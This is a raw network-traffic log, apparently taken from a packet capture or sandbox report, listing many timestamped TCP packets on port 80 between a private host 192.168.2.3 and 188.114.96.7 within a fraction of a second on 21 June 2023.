Jun 21, 2023 04:27:46.946985006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946993113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947001934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947046995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947105885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947137117 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947163105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947221041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947259903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947283030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947328091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947369099 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947386980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947432041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947472095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947489977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947540998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947578907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947599888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947643995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947684050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947702885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947748899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947782040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947805882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947849989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947886944 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947894096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947915077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947937012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947962046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.947963953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.947987080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948012114 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948014021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948036909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948061943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948064089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948087931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948091030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948113918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948134899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948146105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948162079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948188066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948188066 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948213100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948237896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948244095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948272943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948297024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948307991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948323965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948344946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948368073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948390961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948395967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948415995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948440075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948442936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948465109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948491096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948492050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948515892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948542118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948543072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948566914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948590994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948596954 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948616028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948641062 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948642015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948663950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948685884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948708057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948734999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948736906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948756933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948781967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948784113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948806047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948832989 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948832989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948857069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948882103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948884964 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948906898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948931932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948932886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948956013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.948980093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.948981047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949004889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949028969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949031115 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949053049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949076891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949078083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949101925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949126005 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949126959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949151993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949174881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949183941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949198961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949222088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949229002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949246883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949273109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949274063 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949296951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949321032 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949325085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949347019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949372053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949373960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949397087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949418068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949445009 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949445009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949469090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949475050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949492931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949520111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949520111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949543953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949564934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949585915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949611902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949611902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949635983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949657917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949668884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949682951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949704885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949712992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949729919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949754953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949754953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949779987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949800968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949821949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949847937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949847937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949870110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949896097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949897051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949918985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949944019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949944019 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.949966908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949991941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.949992895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950015068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950040102 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950040102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950062990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950087070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950088978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950114012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950139046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950140953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950162888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950185061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950206041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950231075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950232983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950254917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950274944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950297117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950301886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950320959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950344086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950352907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950370073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950395107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950397015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950421095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950444937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950447083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950469971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950494051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950495958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950521946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950556993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950562000 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950582027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950606108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950612068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950658083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950658083 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950671911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950694084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950735092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950774908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950810909 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.950822115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950845003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.950870991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951066017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951090097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951117992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951136112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951180935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951209068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951262951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951286077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951309919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951313019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951339006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951364040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951364994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951410055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951432943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951446056 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951459885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951488972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951577902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951716900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951739073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951765060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951785088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951811075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951812029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.951853991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951946020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951968908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.951996088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952012062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952054977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952096939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952120066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952146053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952163935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952204943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952244997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952284098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952307940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952321053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952334881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952361107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952362061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952406883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952433109 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952452898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952476025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952510118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952541113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952564001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952589035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952589989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952613115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952639103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952658892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952681065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952704906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952707052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952730894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952763081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952776909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952800989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952805996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952832937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952852011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952874899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952879906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952902079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952904940 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.952944994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.952980042 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953011036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953033924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953058004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953061104 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953161955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953161955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953212976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953241110 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953260899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953286886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953339100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953447104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953471899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953476906 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953496933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953524113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953526020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953569889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953602076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953615904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953639984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953665018 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953665972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953725100 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953752041 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953887939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953912973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953934908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.953958988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953958988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.953963041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954041958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954065084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954087973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954113007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954116106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954173088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954200029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954217911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954240084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954263926 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954266071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954288006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954313993 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954334021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954375029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954415083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954441071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954459906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954483032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954509020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954509974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954533100 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.954624891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954699993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954720974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.954737902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.955734015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.974833965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.974864960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.974889040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.974912882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.974940062 CEST	80	49709	188.114.96.7	192.168.2.3
